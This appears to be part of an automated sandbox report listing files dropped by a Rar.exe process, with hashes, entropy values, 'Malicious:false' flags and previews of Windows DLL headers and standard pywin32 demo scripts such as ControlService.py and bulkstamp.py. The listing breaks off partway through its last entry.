                                                                                                                                                                                      Entropy (8bit):5.822660648618855
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Q+UL/q4Cs1L32Dk3J3zfXf/PULQjduSzulBAaAdCqeiJOU+:Cqk73J3zfXfLugcGEzLU+
                                                                                                                                                                                      MD5:2A754EF14BB6BDEE5D63F4827581F586
                                                                                                                                                                                      SHA1:A106AC33A6FAD450C7179FD0A2EA34E7E87E9242
                                                                                                                                                                                      SHA-256:AAD5E5A3180A66E9B594E9B6854241F91C58D2218D7ED4FFEAAEA3FD171D98D4
                                                                                                                                                                                      SHA-512:B97899051064FF95540F3C7728BE8939CE08B8845726E9A4600387A5DC2A9C5D62FCE345C98744696DA80148F4DFB2BBEFD06B142275E615202F892FC7BC6DF5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)p..)p..)p..Q...)p.\q..)p..Bq..)p.\u..)p.\t..)p.\s..)p.4\q..)p.R@q..)p..)q.)p.4\y..)p.4\p..)p.4\r..)p.Rich.)p.........................PE..L......d...........!....."... ......u!.......@............................................@..........................I..P....I..x....p..\.......................D....D..T............................D..@............@..$............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........`.......8..............@....rsrc...\....p.......<..............@..@.reloc..D............@..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34304
                                                                                                                                                                                      Entropy (8bit):6.0706493448180305
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:K/m+OllJEdSFcReeELPXFriF5pERpxx2HvLD:qm+OVeExuF5pERpxUL
                                                                                                                                                                                      MD5:F816A7D3E94862696A44B6369DFB2EA9
                                                                                                                                                                                      SHA1:8852284DC02612F83AA4066564F16D803CF9749B
                                                                                                                                                                                      SHA-256:00F11A5A963F930A263D866A2B6414B3835A51E9C3EC91AAD0668B9E14BF50E6
                                                                                                                                                                                      SHA-512:FAE02DDAB39E207087ED89FEF50ECA368DEBB22D2EAC6D4268AC1F53C6D64C3E516CDB4A23FDC1649860C2EDCCEC44DEDED84A2F0BE7A7FC5C7EC1501FE60F2F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C. .".s.".s.".s.ZKs.".s.W.r.".s.W.r.".s.W.r.".s.W.r.".s.W.r.".spK.r.".s.I.r.".s.".sP".s.W.r.".s.W.r.".s.W.r.".sRich.".s................PE..L......d...........!.....L...6.......M.......`............................................@......................... r..H...hr..........L.......................L...4l..T............................l..@............`..<............................text...+K.......L.................. ..`.rdata.......`... ...P..............@..@.data...l............p..............@....rsrc...L............x..............@..@.reloc..L............|..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23040
                                                                                                                                                                                      Entropy (8bit):5.7004102661011204
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:ni14OW/KNbivlL7p95MlMHMyM60QYMuVGSLNpuKMjwaahTO3KBQ77d1qGQCilGN:COKNAlL7VMlMHMyM60QYMu8SZpuiRVey
                                                                                                                                                                                      MD5:1DBE59165907DA9B1EB6CFD713D12B00
                                                                                                                                                                                      SHA1:7EDD94FFCB589CB68D33125ADC3AF3F7A0D82C41
                                                                                                                                                                                      SHA-256:E0E5897DC50BBF76DD32730216992FF402A799ED0FF8DF338F6CDF59C385348B
                                                                                                                                                                                      SHA-512:B135532F44B4E1F945BD24ABE559A120CE37F06BB75300540C852D71BC22F214323C2B96E103C5C862F8E396C1933A4150A06BF3B33EBD8F295C600EBDE81F44
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R"K..C%_.C%_.C%_.;._.C%_D6$^.C%_.($^.C%_D6 ^.C%_D6!^.C%_D6&^.C%_.6$^.C%_.*$^.C%_.C$_RC%_.6,^.C%_.6%^.C%_.6'^.C%_Rich.C%_........................PE..L......d...........!.........(......v*.......@............................................@..........................M..P...@N.......p..T.......................(....G..T...........................`G..@............@..,............................text...3,.......................... ..`.rdata..d....@.......2..............@..@.data...t....`.......J..............@....rsrc...T....p.......P..............@..@.reloc..(............T..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                      Entropy (8bit):5.519899099469349
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:6V8rwsZ9DOOAXldyxfF6jdeq75G3hOO/pOFK9:6VZvldyHS74PhO49
                                                                                                                                                                                      MD5:08B864ADB87687152CD57999ABD5FE1A
                                                                                                                                                                                      SHA1:3F3EF6CBEDC9E8E22ECF573F3D00DB889C61FA0D
                                                                                                                                                                                      SHA-256:D49156080F394B23CC595AB6630125A20BAF16F2B8904B3133987D4F3F18B9DC
                                                                                                                                                                                      SHA-512:6119F3A3CCCEF5921376665007C37893023D896DEEF09C98BD76EC44E1588A51F8A953126F0163669F71F46EC6C8CF484A427EC1BC0BF08F73656898D7880E4E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......yt.T=...=...=...4m..9...o`..?...o`..7...o`..7...o`..<...)~..8...=........`..<....`..<....`|.<....`..<...Rich=...................PE..L......d...........!................k .......0...............................p............@.........................@7.......7..x....P..,....................`......02..T............................2..@............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....rsrc...,....P.......2..............@..@.reloc.......`.......<..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17408
                                                                                                                                                                                      Entropy (8bit):5.441828005763723
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:XeJOXLVXp5ftMPeG6pPjf374xkLn2JxbRqDNIhl:Xe8X/BtMWG6pz37eYSFRqDNIh
                                                                                                                                                                                      MD5:78F6F257CF3AA97F4261749A37968A5F
                                                                                                                                                                                      SHA1:7A6F6DB50ECB6EA66DF5A12EBF282682EC634453
                                                                                                                                                                                      SHA-256:E753C57CC2F31A888BAF162EB9B28C771BDFABFCE5AB977969EE7D957DD5270B
                                                                                                                                                                                      SHA-512:A0A177AE9E98C6FA5C95666D2359E29107EAFBB12483B073CBFF1E42854A979E42D8B49780F536B906D15AF83809780B0C805B11A4D0CB0BE5A704B75BC184C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.....\...\...\.rj\...\...]...\...]...\...]...\...]...\...]...\.c.]...\.a.]...\...\...\...]...\...\...\...]...\Rich...\........................PE..L...,..d....................."...............0....@.......................................@..................................9.......`.......................p..L....4..T...........................P5..@............0...............................text...3........................... ..`.rdata..8....0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc..L....p.......@..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18043
                                                                                                                                                                                      Entropy (8bit):4.297873544548919
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:iCQsViutcVu/s7ncf1wqad7fOXuH+nUpTr4:iC7GcTad7fOXuH+nM4
                                                                                                                                                                                      MD5:4FC327FDD744665C26F3E21B58E3D385
                                                                                                                                                                                      SHA1:C1B6060579286A5695870769547244211DE35794
                                                                                                                                                                                      SHA-256:511A0E1F785C7643E8FF535245A3F0710005F161A5428D522E352D760C102393
                                                                                                                                                                                      SHA-512:13AFDE4113282AF90B53D1E597749777F3B3FA6C9BB268B80398D5B878AA41D9B44D31E2D310E24CCA025A919E707B37E41F5EE6611D327C9522B680DD3F89C6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ControlService.py.#.# A simple app which duplicates some of the functionality in the.# Services applet of the control panel..#.# Suggested enhancements (in no particular order):.#.# 1. When changing the service status, continue to query the status.# of the service until the status change is complete. Use this.# information to put up some kind of a progress dialog like the CP.# applet does. Unlike the CP, allow canceling out in the event that.# the status change hangs..# 2. When starting or stopping a service with dependencies, alert.# the user about the dependent services, then start (or stop) all.# dependent services as appropriate..# 3. Allow toggling between service view and device view.# 4. Allow configuration of other service parameters such as startup.# name and password..# 5. Allow connection to remote SCMs. This is just a matter of.# reconnecting to the SCM on the remote machine; the rest of the.# code should still work the same..# 6. Either implement the startup parameter
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2789
                                                                                                                                                                                      Entropy (8bit):4.683118967004213
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:CUAgR5xR8uwd8pI8Q5IqnA3aze4v2EaXBbKzaIOZ4KKi5XMK7c:CVgRp8uwd8pI8QSh3aze4v2EaxbKPOZS
                                                                                                                                                                                      MD5:A84154C766E7562DA3A8FBA7352394A5
                                                                                                                                                                                      SHA1:2F865533CE526A05C840CF3AE13A24364F9763BE
                                                                                                                                                                                      SHA-256:2851E3C6A67762E73A406A95EC6BFC0C8326D4F6C24271CD089853368A86518A
                                                                                                                                                                                      SHA-512:AA3323C9D3004AF8F51EC20EAFCB61CA41701B49845CDDA40D2C753D35980DB77243DCF15DACE8B63750D083DED600CACB659FC64BFF38A9035F4BB07AC7AEAC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# BrandProject.py.#.# Brand a VSS project with a "build number", then optionally.# stamp DLL/EXE files with version information...import os.import string.import sys..import bulkstamp.import vssutil.import win32api...def BrandProject(. vssProjectName,. descFile,. stampPath,. filesToSubstitute,. buildDesc=None,. auto=0,. bRebrand=0,.):. # vssProjectName -- The name of the VSS project to brand.. # descFile -- A test file containing descriptions of the files in the release.. # stampPath -- The full path to where the files referenced in descFile can be found.. path = win32api.GetFullPathName(stampPath).. build = vssutil.MakeNewBuildNo(vssProjectName, buildDesc, auto, bRebrand). if build is None:. print("Cancelled"). return.. bulkstamp.scan(build, stampPath, descFile). for infile, outfile in filesToSubstitute:. SubstituteVSSInFile(vssProjectName, infile, outfile). return 1...def usage(msg):. print(msg). print(.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4207
                                                                                                                                                                                      Entropy (8bit):4.3918564406115115
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:JJUsZxWPFVUfLIwJg+0L+0fy94bB1G+x3qafWWlxx84V1Hzvqs:JJVxWDUBJR0L+B4jGZafWWrx3Hzvqs
                                                                                                                                                                                      MD5:3DAF8F9FB9BE8BBE4AF313F518CECDEF
                                                                                                                                                                                      SHA1:743AFB529F2798F0CF774FB451BF8BFD83AC261A
                                                                                                                                                                                      SHA-256:76A2C2F847AF7D90ABA65C5F39306E23551F52F2FB7686CF45AB3F4E6C96F635
                                                                                                                                                                                      SHA-512:DBAAED775B3F922A2F2B09EC57DABC8D0F3C8E8DC66317407D882550C58F077720F05AECDCDBAE9A2FA997CCE733A84D7B9F880C64F2791E58C5A8BED31BDD9F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#.# bulkstamp.py:.# Stamp versions on all files that can be found in a given tree..#.# USAGE: python bulkstamp.py <version> <root directory> <descriptions>.#.# Example: python bulkstamp.py 103 ..\win32\Build\ desc.txt.#.# <version> corresponds to the build number. It will be concatenated with.# the major and minor version numbers found in the description file..#.# Description information is pulled from an input text file with lines of.# the form:.#.# <basename> <white space> <description>.#.# For example:.#.# PyWinTypes.dll Common types for Python on Win32.# etc.#.# The product's name, major, and minor versions are specified as:.#.# name <white space> <value>.# major <white space> <value>.# minor <white space> <value>.#.# The tags are case-sensitive..#.# Any line beginning with "#" will be ignored. Empty lines are okay..#..import fnmatch.import os.import sys..import verstamp.import win32api..numStamped = 0..g_patterns = [. "*.dll",. "*.pyd",. "*.exe",.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5690
                                                                                                                                                                                      Entropy (8bit):4.631936788839383
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:i7w5LSUoVs8wS87n/R2QXfPAEdr3wUsUt2DUxY2dcXTl3UVTRgtjkzFidMl0+xK3:IUobwSan/R2QxdhpxVqXREVTeqc+xaB
                                                                                                                                                                                      MD5:CAEB3C147B18ED16091C79BED0124013
                                                                                                                                                                                      SHA1:AF38CCF2C2D6B612BB236A741349BAEC414553F1
                                                                                                                                                                                      SHA-256:29D4CAC8631D01D1ABFDFDF26B8DEE88EF22EBEF484C50238BCAC8DF1FEAD2CC
                                                                                                                                                                                      SHA-512:1C4BA38FBCA369E1E1375C250FD619C45895AB06ED9417053A8CAC5059176F54C126BC61AF7F3D3A3B100FBAA7B5862F307B475F7F184DD960092B3D5A414D7A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import string.import time.import traceback..import pythoncom.import win32com.client.import win32com.client.gencache.import win32con..constants = win32com.client.constants..win32com.client.gencache.EnsureModule("{783CD4E0-9D54-11CF-B8EE-00608CC9A71F}", 0, 5, 0)..error = "vssutil error"...def GetSS():. ss = win32com.client.Dispatch("SourceSafe"). # SS seems a bit weird. It defaults the arguments as empty strings, but. # then complains when they are used - so we pass "Missing". ss.Open(pythoncom.Missing, pythoncom.Missing, pythoncom.Missing). return ss...def test(projectName):. ss = GetSS(). project = ss.VSSItem(projectName).. for item in project.GetVersions(constants.VSSFLAG_RECURSYES):. print(item.VSSItem.Name, item.VersionNumber, item.Action)...# .item=i.Versions[0].VSSItem.# .for h in i.Versions:.# ..print `h.Comment`, h.Action, h.VSSItem.Name...def SubstituteInString(inString, evalEnv):. substChar = "$". fields = string.split(inString, substChar)
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1268
                                                                                                                                                                                      Entropy (8bit):4.508504303752949
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:8FWqM5oI3Zqiiko/B/cdyXKe1KLEnK4mnR3YvUN84+JApAtGh:Tq4oI3YuSVW7e1K4lmnRpN8JJAuM
                                                                                                                                                                                      MD5:3DE21CB285822AB13A643A67AE18808E
                                                                                                                                                                                      SHA1:70EAD65A85909EDAD23FA14EA2A6FBAF4F798BA1
                                                                                                                                                                                      SHA-256:9AFCB5B2D0C07224554E5A1B2DD0954092A09AE1B30824376CBD29CEA44340E4
                                                                                                                                                                                      SHA-512:50EF3A5013DB970DAAE33AA57A752F6036CEC7B99012E9436C8E5A1517BE5A676EF820CDDFA80DC22C9ABA7451739AE96039E7A0A534BA173BAC24CC9F7C7FB6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generate a base file name.import os.import time..import win32api.import win32evtlog...def BackupClearLog(logType):. datePrefix = time.strftime("%Y%m%d", time.localtime(time.time())). fileExists = 1. retry = 0. while fileExists:. if retry == 0:. index = "". else:. index = "-%d" % retry. try:. fname = os.path.join(. win32api.GetTempPath(),. "%s%s-%s" % (datePrefix, index, logType) + ".evt",. ). os.stat(fname). except os.error:. fileExists = 0. retry = retry + 1. # OK - have unique file name.. try:. hlog = win32evtlog.OpenEventLog(None, logType). except win32evtlogutil.error as details:. print("Could not open the event log", details). return. try:. if win32evtlog.GetNumberOfEventLogRecords(hlog) == 0:. print("No records in event log %s - not backed up" % logType). return. win32e
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8273
                                                                                                                                                                                      Entropy (8bit):4.506389676116937
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:jb+gnqVXwnUVqIAbmz/BiN0ldUGCIp7BwVy1Hu/3w8Ed6ZJvQPsrQyKrztxPbHAT:2oaS0zT0fEd62ZhsqdSxmS+S+vUHkHi
                                                                                                                                                                                      MD5:8AE8F1287D1CA8C90E8041E451510529
                                                                                                                                                                                      SHA1:A345CF8CD0F4D2D102F1312E99EA12161EBE3709
                                                                                                                                                                                      SHA-256:36F8729DBF8A7B648F4392875EF310DD1EC6F670F51219DD7876C67C941F0509
                                                                                                                                                                                      SHA-512:215573442BCEB635CF5EECBA1912EECE075CD849125446E58DAC8443A264FC13C5374F99F1C7C83CA42839E8A7202B34B6591AD825757378917A67453914ACB3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Simple CE synchronisation utility with Python features...import fnmatch.import getopt.import os.import string.import sys..import win32api.import win32con.import win32file.import wincerapi...class InvalidUsage(Exception):. pass...def print_error(api_exc, msg):. hr, fn, errmsg = api_exc. print("%s - %s(%d)" % (msg, errmsg, hr))...def GetFileAttributes(file, local=1):. if local:. return win32api.GetFileAttributes(file). else:. return wincerapi.CeGetFileAttributes(file)...def FindFiles(spec, local=1):. if local:. return win32api.FindFiles(spec). else:. return wincerapi.CeFindFiles(spec)...def isdir(name, local=1):. try:. attr = GetFileAttributes(name, local). return attr & win32con.FILE_ATTRIBUTE_DIRECTORY. except win32api.error:. return 0...def CopyFileToCe(src_name, dest_name, progress=None):. sh = win32file.CreateFile(. src_name, win32con.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None. ).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1994
                                                                                                                                                                                      Entropy (8bit):4.626371651169389
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ZIaltbtF61tB8UbtsTIgP70kWkHDHbJTJngTlM0yvVDb6kXi4GdUe:5DFqmssEgP7TbbJTJH0gfTXi4Pe
                                                                                                                                                                                      MD5:CF3D42D61D5ABEA7E4F7AC5279237F75
                                                                                                                                                                                      SHA1:670323D1F0651A3800E503E058D6734A7683FA2B
                                                                                                                                                                                      SHA-256:DAC26F4040B87A3D9E8A49EE4A08696A280EBC9710E39B98C576B7E322002DF8
                                                                                                                                                                                      SHA-512:5F655E0A28FFC6FD73628F7A9068875CACBBF66193CDE7C3CEB162164BACD152C5CB9DD8A777550312A95F4EB984933CDA8B9B49CBAAFACAEADAB725C9DC2721
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Kills a process by process name.#.# Uses the Performance Data Helper to locate the PID, then kills it..# Will only kill the process if there is only one process of that name.# (eg, attempting to kill "Python.exe" will only work if there is only.# one Python.exe running. (Note that the current process does not.# count - ie, if Python.exe is hosting this script, you can still kill.# another Python.exe (as long as there is only one other Python.exe)..# Really just a demo for the win32pdh(util) module, which allows you.# to get all sorts of information about a running process and many.# other aspects of your system...import sys..import win32api.import win32con.import win32pdhutil...def killProcName(procname):. # Change suggested by Dan Knierim, who found that this performed a. # "refresh", allowing us to kill processes created since this was run. # for the first time.. try:. win32pdhutil.GetPerformanceAttributes("Process", "ID Process", procname). except:. p
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2722
                                                                                                                                                                                      Entropy (8bit):4.5589989171602765
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:XdgqmyiL1X69f0+FaGtOJ/kpZAbAKSck7/zir0/PNX/hJyJPrdby8pFdfeg79yGT:XdgqZiL1K9xFnprAbA8k7/zt/VX/hqrF
                                                                                                                                                                                      MD5:11B0D54C2FF5F7A09F058B2F0007E51C
                                                                                                                                                                                      SHA1:5B7DBCC531E668CED8A64E77E8B3ECAEA74F1EFF
                                                                                                                                                                                      SHA-256:CC4BD24331F177797371A0F6F725F8D370A544B95C9C1471B9CE52D9C7A0BF0D
                                                                                                                                                                                      SHA-512:78829C0E9851BC8D6D44C212BDABE4FD72652EA00F3DE784B8DA8813DD09820D7F6ECB9F1187DB3F11CDF625BF0888A2056978CD0F76CA820852D5B1FEF28F2B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo of using the RAS API from Python.import sys..import win32ras...# The error raised if we can not.class ConnectionError(Exception):. pass...def Connect(rasEntryName, numRetries=5):. """Make a connection to the specified RAS entry... Returns a tuple of (bool, handle) on success.. - bool is 1 if a new connection was established, or 0 is a connection already existed.. - handle is a RAS HANDLE that can be passed to Disconnect() to end the connection... Raises a ConnectionError if the connection could not be established.. """. assert numRetries > 0. for info in win32ras.EnumConnections():. if info[1].lower() == rasEntryName.lower():. print("Already connected to", rasEntryName). return 0, info[0].. dial_params, have_pw = win32ras.GetEntryDialParams(None, rasEntryName). if not have_pw:. print("Error: The password is not saved for this connection"). print(. "Please connect manually selecting the 'save
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20460
                                                                                                                                                                                      Entropy (8bit):4.586626567064987
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:fJoTy/B6H8DfSp6KH3O0mV35PPWjvVWC3qxRS:fJoTyJ6HgKXO0U5PPWhqS
                                                                                                                                                                                      MD5:D7E5CFFE47C88CA037338FD94EA1AF5B
                                                                                                                                                                                      SHA1:CD59B2438108227FA97263805B7C4E7D9956B1A5
                                                                                                                                                                                      SHA-256:8A54BCF838F37CB1F49074DC2254AF3EA57926C2ACCD8C5CF201F9C554BD186E
                                                                                                                                                                                      SHA-512:60D03ACE715A73DA2B695BF1B8448A52488D82FDB79CAB48FB4591717C0AD107AA68545B9C240A750728E6BD7FA258BE4C70C1C764EF5CC2FEE425814319676A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A tool to setup the Python registry....class error(Exception):. pass...import sys # at least we can count on this!...def FileExists(fname):. """Check if a file exists. Returns true or false.""". import os.. try:. os.stat(fname). return 1. except os.error as details:. return 0...def IsPackageDir(path, packageName, knownFileName):. """Given a path, a ni package name, and possibly a known file name in. the root of the package, see if this path is good.. """. import os.. if knownFileName is None:. knownFileName = ".". return FileExists(os.path.join(os.path.join(path, packageName), knownFileName))...def IsDebug():. """Return "_d" if we're running a debug version... This is to be used within DLL names when locating them.. """. import importlib.machinery.. return "_d" if "_d.pyd" in importlib.machinery.EXTENSION_SUFFIXES else ""...def FindPackagePath(packageName, knownFileName, searchPaths):. """Find a package.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3500
                                                                                                                                                                                      Entropy (8bit):4.703409335080606
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:zz6vYYgifc7r7hVqHUYq6xU9LoJSvkzzgxRqI+ikT8J:zzpT7nhVqjlxU16hzgLqZjT8J
                                                                                                                                                                                      MD5:4F4E28EE25DADE82161FD7FF394CB7B6
                                                                                                                                                                                      SHA1:C37C8B0D10E0C757D1CD44AD1C718C69935416D6
                                                                                                                                                                                      SHA-256:1C286DCFADB16AAEEB70F5D0CB0BCAE51084B00E58228896E1B0FA942A7A5098
                                                                                                                                                                                      SHA-512:F624877D4C8A1CBCAB71FB548071CD06B0C835E4B9B4310540111649B71810AD3F1D56F15A4A54816B91093D6D883D0154C59119172092BF95057A5D2A019CD8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Install and register pythonxx_d.dll, pywintypesxx_d.dll and pythoncomxx_d.dll.#.# Assumes the _d files can be found in the same directory as this script.# or in the cwd...import os.import shutil.import sys.import winreg..import win32api...def usage_and_die(rc):. print(). print("This script is designed to copy and register the Python debug"). print("binaries. It looks for pythonxx_d.dll, pythoncomxx_d.dll etc,"). print("and installs them to work correctly with Python debug builds."). print(). print("You will generally find this script in the. zip file that"). print("included these _d files. Please run this script from"). print("that directory"). sys.exit(rc)...if win32api.__file__.find("_d") > 0:. print("This scripts appears to be running a DEBUG version of Python."). print("Please run it using a normal release build (python.exe)"). usage_and_die(1)..try:. import pythoncom.except ImportError as details:. print("Could not import the release v
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34304
                                                                                                                                                                                      Entropy (8bit):5.766904899896164
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:Eus9dTayzceMuRh+0RSRpnR5OXtbvjXObm2PI:k9dD5RHcRpR4tbbXObXPI
                                                                                                                                                                                      MD5:DD419E9F89E8A2815858A8B6D059C027
                                                                                                                                                                                      SHA1:1158C7CD0A7A1298F8DCE6B651814112CCC1456E
                                                                                                                                                                                      SHA-256:CABDFF87D5A1118F16DB1672DEC81394183DC9D644CF98EEFD992F62000BCE83
                                                                                                                                                                                      SHA-512:ADC9D15D3FE7E80E65E2E1D8C026B6CB561A79182F10543A01E91DE33ED36944954BA0458C2FF5115B99AAB1C104E3ADB929184E0A380F3A697A7E5775DD40ED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T_..51..51..51..M...51.@0..51.@4..51.@5..51.@2..51..@0..51.x\0..51..^0..51..50..51..@8..51..@1..51..@...51..@3..51.Rich.51.........................PE..L...I..d...........!.....<...F......';.......P............................................@.........................pc..`....d..........x.......................t....\..T...........................`\..@............P.. ............................text...z:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....rsrc...x............j..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5471
                                                                                                                                                                                      Entropy (8bit):4.483065386918216
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:kC/Zakzv+Hjce4Dr+fYH+M5+PX2cYU/Bi0EBdktW2E9mIq:kNiFxUZcBdktVqq
                                                                                                                                                                                      MD5:9A0B2387B2891F63CAE03C9E2DDC3322
                                                                                                                                                                                      SHA1:963FBED7627CFE59C4223211D3CE115FD0E77849
